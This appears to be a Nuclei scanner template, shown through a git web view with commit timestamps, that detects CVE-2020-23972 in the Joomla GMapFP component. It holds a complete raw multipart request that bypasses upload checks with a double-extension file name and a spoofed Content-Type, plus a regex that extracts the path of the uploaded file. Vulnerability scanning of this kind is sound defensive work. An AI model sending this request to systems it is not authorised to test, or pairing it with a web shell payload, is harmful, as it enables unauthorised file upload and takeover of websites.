nuclei-templates/cves/2020/CVE-2020-23972.yaml

59 lines
2.0 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-23972
2020-12-01 09:25:33 +00:00
info:
name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
author: dwisiswant0
severity: high
description: |
An attacker can access the upload function of the application
without authenticating to the application and also can upload
files due the issues of unrestricted file upload which can be
bypassed by changing Content-Type & name file too double ext.
reference:
- https://www.exploit-db.com/exploits/49129
- https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
- http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2020-23972
cwe-id: CWE-434
tags: cve,cve2020,joomla
2020-12-01 09:25:33 +00:00
requests:
- raw:
2020-12-01 09:25:33 +00:00
- |
POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
2020-12-01 09:25:33 +00:00
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: {{BaseURL}}
Connection: close
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="option"
com_gmapfp
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
Content-Type: text/html
projectdiscovery
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="no_html"
no_html
------WebKitFormBoundarySHHbUsfCoxlX1bpS--
payloads:
component:
- "com_gmapfp"
- "comgmapfp"
2020-12-01 09:25:33 +00:00
extractors:
- type: regex
part: body
regex:
- "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"